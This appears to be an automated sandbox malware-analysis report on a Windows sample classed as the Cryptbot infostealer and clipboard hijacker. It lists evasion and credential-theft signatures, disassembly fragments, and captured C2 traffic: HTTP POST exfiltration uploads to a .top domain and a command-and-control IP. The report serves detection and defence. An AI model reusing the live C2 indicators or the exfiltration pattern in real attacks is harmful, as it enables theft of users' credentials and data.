Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559089
MD5: 86dce43872ffd26d6225323bf7f0c76f
SHA1: 9bee03858ee62de271b3b29b0144b27892927a13
SHA256: 2eeba583715e37c4f8632f58d1c49a6d0ef7fdf6815d4bc7593c492a45aca663
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: file.exe Avira: detected
Source: file.exe Virustotal: Detection: 45% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_009F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0E14B0
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3f6396ec-5
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_009F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C100860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1BF960h 8_2_6C0FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C104453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C10C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C10E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C180730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C100740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C13A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C100260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1BD014h] 8_2_6C1B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C157D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C153840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C10D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C139B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C11BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C11BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C159600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C10D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1BDFF4h 8_2_6C153690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C10D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C183140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C10D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C177350
Source: chrome.exe Memory has grown: Private usage: 5MB later: 23MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49736 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49753 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 34.116.198.130:80
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------1YvXSLVPJAoQ5dCNS65LHKData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 59 76 58 53 4c 56 50 4a 41 6f 51 35 64 43 4e 53 36 35 4c 48 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 61 6a 65 71 65 6c 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 99 25 36 d7 c3 ab 4c 91 a2 bc 14 35 1f b2 56 30 d4 e6 04 c1 af 2e 5c c7 ba 30 58 45 08 81 dc cb 2a 8f 2a 79 cb 40 d3 e3 e2 33 30 ae b3 70 ca e8 89 c0 a8 7d 02 e5 92 38 bd 35 ce 34 ec 30 99 b9 9e 10 76 e4 68 e4 2f ea e1 d0 94 ed 03 98 30 26 11 f8 55 76 19 cb 14 89 20 74 45 c2 a9 fe f4 ad c3 c6 0b bc ae 27 96 b5 b2 6a 79 0d 92 c0 bd 1e ac 1b 2e f7 51 45 4b a9 79 2f 2d b9 97 92 ac 15 28 b9 97 dd 22 f9 c8 d3 95 b4 72 da 5e a9 dc 88 7a ff 3b b5 20 80 60 d1 e9 f4 fc f0 a3 a5 1f 52 68 de eb e8 c1 fd 79 19 1d 1e 34 f7 09 7f 40 2e b7 39 5f 9b de c6 87 32 d1 8f e5 ea 85 35 f2 16 60 0a 6e 14 2c 37 3f c9 31 de e4 9b 1b d0 ba 3b ec 48 7a 19 da 64 f2 da cc 0e fe 00 27 98 af a7 a5 06 44 35 c1 06 67 a2 8d 0c 24 31 e9 3d 99 fd 6b 4e 2b 01 60 14 9c 9d 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 59 76 58 53 4c 56 50 4a 41 6f 51 35 64 43 4e 53 36 35 4c 48 4b 2d 2d 0d 0a Data Ascii: --------------------------1YvXSLVPJAoQ5dCNS65LHKContent-Disposition: form-data; name="file"; filename="Jajeqelu.bin"Content-Type: application/octet-stream%6L5V0.\0XE**y@30p}8540vh/0&Uv tE'jy.QEKy/-("r^z; `Rhy4@.9_25`n,7?1;Hzd'D5g$1=kN+`--------------------------1YvXSLVPJAoQ5dCNS65LHK--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 76571Content-Type: multipart/form-data; boundary=------------------------kauhXkVPYhzLhMSx47SQqLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6b 61 75 68 58 6b 56 50 59 68 7a 4c 68 4d 53 78 34 37 53 51 71 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 6c 75 71 75 6c 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 55 66 81 c2 9b 50 39 7e 32 23 64 f8 fc e0 c1 e8 06 5d 6a 06 c5 c2 b0 be 60 7e 23 c4 72 22 14 66 87 12 a7 7e e5 6e 84 47 6e e5 e8 28 d0 d5 77 60 48 44 a3 e7 a3 73 38 35 e6 03 13 42 ad 88 20 d3 73 80 c5 ff 52 54 ac f0 99 8a 67 e0 74 4b 7b 30 d3 0d 52 e2 c0 01 e0 a7 62 21 48 28 a4 79 ee 02 01 1b 69 ef a7 b1 7a d7 82 ae d7 19 94 c0 f6 27 3a 3a c0 46 39 d0 f7 88 27 ca 1c 92 94 c7 22 9a b1 78 24 57 58 9a a2 53 bc 37 f6 3f 48 b5 f4 92 e8 21 92 0e 28 48 5f 12 c2 ee 9b 11 e2 c4 99 3d 07 1c 30 33 cf 6d e5 b0 f5 67 ec 54 57 03 5c bf bd 5d ea 56 78 84 5d 2c 99 d3 de 94 66 0c e5 eb 73 51 5c f9 f2 79 72 4a 28 ee 56 07 7e f5 69 aa 6d 39 91 0d fb 5e 01 1b c1 64 62 ca a8 5d 79 35 ec 9e 88 e1 e9 95 98 4d 1e 08 59 cf fa 14 7d d1 83 a4 4b b0 40 ac c0 8e 85 95 99 fc 2d 7c 4a d8 1a 2c 03 f9 d7 6f 6a 0b 0c 76 40 e3 65 14 d3 cb db 76 d2 9d 7d a3 c3 05 5e 48 9c f6 0f da cf 69 d9 82 78 56 bc 51 41 22 af 98 26 5c b2 a5 22 77 f1 4a 94 e6 04 0a c9 22 54 c9 03 a5 a3 bd 5d 5e 54 82 b0 2e be 61 c8 03 18 88 5e 35 7f ab d3 2d 06 c6 bc b1 6f 1b f6 f4 42 4c da 7c 47 26 6e 64 a5 a6 7d dd c7 59 a1 9e 1f 0e 94 60 f2 0a 69 56 f8 4c 66 7d ca 2e 27 ea f5 c6 86 22 8f 38 e5 6e 3a cf 8e ee 29 a4 a9 65 36 a8 d3 f1 8d a0 07 26 a6 5c 27 2a 04 ff 5f 16 96 cd 48 35 14 18 b1 51 b5 04 25 53 ee e4 32 5d 08 21 b2 1d c5 82 1e ca 80 42 4a d9 4f 02 34 c6 9f 72 8e e9 70 2e 43 00 ad d0 9b 27 62 83 c0 7f 74 81 d0 87 de fb da d3 a8 fd ec d8 26 72 b3 c6 dc ef 4d 22 7e d0 1b b0 ea bc 06 8f 6c d1 b0 f3 8f f6 01 b9 f7 ee e1 61 dc f8 2c bd 64 5b 47 1d 91 88 7d b3 c4 ef da 28 7a 0b 59 a4 15 a1 47 94 69 36 ea e5 44 71 4c 01 9b 66 17 db 83 17 ea 36 bf 63 fb e0 6e 1e 10 94 6c 65 64 96 ce 95 d9 eb c5 37 38 37 e7 9e 03 26 8d 10 d6 5f b5 2b cf 20 9a 65 31 b5 94 02 72 6a cf e4 ed 92 ad a2 9a 0d 43 12 01 c7 b9 4c aa db 37 0c da da b1 9e 68 23 87 63 2c e2 76 e8 85 a2 cd 0f a7 90 9f aa e6 4a 69 86 28 fb b5 d3 ba 49 11 03 05 6c ea b4 ea cc 83 e1 e5 c1 65 3c 53 85 d3 62 25 ea ca b3 6a ca 8d 38 c8 b1 9f b9 42 90 9c 82 17 d2 a8 ae 8a c7 1b 54 7f 39 1e 7f 9e e0 20 88 df b2 f3 af ab 35 74 f3 5c 82 7f 32 50 ce 2b fc be 97 49 cb 97 39 3f b1 d3 21 07 25 99 eb 88 ea 90 25 ab 5b 95 ca a5 d4 3e 21 e3 d9 37 19 22 de 63 2e b9 fa ac 8b dd 20 2d 6d ab 49 bc 33 2a f3 3d 56 3c 03 24 91 02 06 4b af af f6 2a 9a 5e a3 a9 20 b5 22 ee 9f 3c ae 03 81 47 02 22 a9 60 25 95 b0 9a 9e a4 c4
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27812Content-Type: multipart/form-data; boundary=------------------------XanHhr2A1jI3E7wL1nB93yData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 58 61 6e 48 68 72 32 41 31 6a 49 33 45 37 77 4c 31 6e 42 39 33 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 75 6b 75 63 75 62 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a df 5a 4e 3e 3e 5f ec ee 43 35 89 f0 e8 c1 01 3d fc 82 1e 82 40 b7 e2 e3 b4 05 65 c2 17 a3 8c 0d 13 97 74 d7 05 a7 36 02 3c 72 61 91 72 5e 3f 64 01 63 67 1a 67 aa ea 66 c9 8c dd c9 c8 9e a5 d3 f1 5d c7 bd 48 c4 40 55 08 ae d7 15 84 20 92 3b a1 7e b4 81 af 58 c2 ed 84 b0 e3 d4 0b 2c 21 3e 4b ba c2 64 e4 ae 17 6d 35 5a 38 51 23 4f a3 47 a1 0c 8f 77 3c d0 cd 2b bc aa 8c 57 c7 ad 51 62 ab ca 09 9a 38 d0 1c 6f 7c 7e a3 b4 73 68 9b be 49 84 ca 71 4b 4b 5b a4 aa a9 fc 9f 99 38 be 93 b0 98 06 5c 8d de ef 75 f1 d5 eb 2f a9 b7 94 38 73 eb fd 25 59 e1 80 f1 d2 6c 57 15 a6 ab 5c ab 61 1e 09 98 34 01 8f ad 9e 0f f7 37 1b 50 d7 92 9a f4 ab 93 f4 42 0d 6c 5d 07 16 30 a5 cc 6f a8 b5 99 08 b1 9b e0 15 6e 01 09 73 54 68 4c 4a c5 c4 ef 31 b5 df a3 06 1d 7e c0 45 82 71 5d 0c 86 25 ef b7 f4 78 ac 13 62 d1 6c e6 04 3f 74 e6 78 66 8b b2 b3 52 39 ad e9 69 b3 63 3b bd c8 c9 83 ff 38 ca fc fe de ee ea 1f 6e 4e 64 4e 36 34 9a dc ee f1 ce c9 47 74 a5 3d 2b 1d 41 a8 ee b3 fc 41 ff 0f c7 95 ff 38 e0 cd 7d 88 7a d0 16 e7 d1 98 f1 7c df 51 17 78 e4 9f 6f 52 c0 ec 9e 66 90 9f 20 62 9e 11 84 d9 dd b8 f2 1c e8 a9 a3 f6 c0 6f 5f 72 08 e7 5f 64 46 03 1f ca 7b 10 f2 bf 03 5b 70 c2 ae e0 7d f8 21 a6 71 a7 bd 84 5f aa 4e 21 84 8e 43 53 ab fb 99 f1 71 70 6d 98 27 9c 74 94 fd 0d fc 54 a1 d6 84 02 ad 70 fe f4 7d 85 aa f0 c3 3f e0 b3 44 89 7f 06 f9 c1 72 d5 e8 3a 27 d1 2e 53 4d e0 27 0a ee f6 f8 e4 1d cb 01 2d a7 23 50 07 40 5d 65 f0 35 fa 45 56 92 04 21 7f b0 6a 98 48 cf cc f5 d3 8f f4 49 02 92 8e 1b f1 f1 bb dd 9b dc 43 11 b0 8d 18 7d 84 07 31 df 69 95 21 9f 39 dd f0 2a 36 0b 74 7a a8 aa ac 64 38 d8 64 25 78 53 f2 a6 31 26 1f f3 b3 36 77 75 a0 af c6 11 e7 08 ff eb 35 4a 11 86 5f ed 15 2a 49 db b8 66 17 a8 19 b3 87 da c7 8f 71 99 cb 45 98 de 1e 43 55 e7 77 76 59 9e bb 39 8f 5d c5 e6 70 1a 2a cc 78 da de f7 0e 0b 31 29 48 9e 63 e6 8a d2 34 74 58 50 f4 b0 70 a5 18 ba 75 75 20 f8 cf b9 03 32 60 26 af 26 5f 8e 0a 0a aa e7 fc ce 2e 3d 96 27 ad 92 bf 83 74 58 07 6e 63 8e e1 a0 07 4b 2a c3 51 d2 08 f2 75 40 7b ec 1f 1b f4 d3 60 7a 0e 31 87 f9 c5 3b 39 2e 2c 7a bd e9 c5 0f e3 d5 c1 d3 89 aa f1 17 bd b2 00 8f 3d c3 8e 19 06 0e 12 41 ae ff 1a b4 9a a1 a2 23 b6 05 a3 f9 11 5a b4 fb 58 65 5c 41 4d ae 4a 23 3f 4e 48 e9 c1 47 b6 a0 5d 7c c4 2a 35 42 bc dd 99 ca fd c5 a8 1e 80 d2 78 60 09 7b 2a ea 57 32 f3 ce 2c 06 13 4a cb 86 39 c3 a6 e1 0f
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.1994063155.0000197C0316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1993689293.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1994168861.0000197C03118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.1994063155.0000197C0316C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1993689293.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1994168861.0000197C03118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) 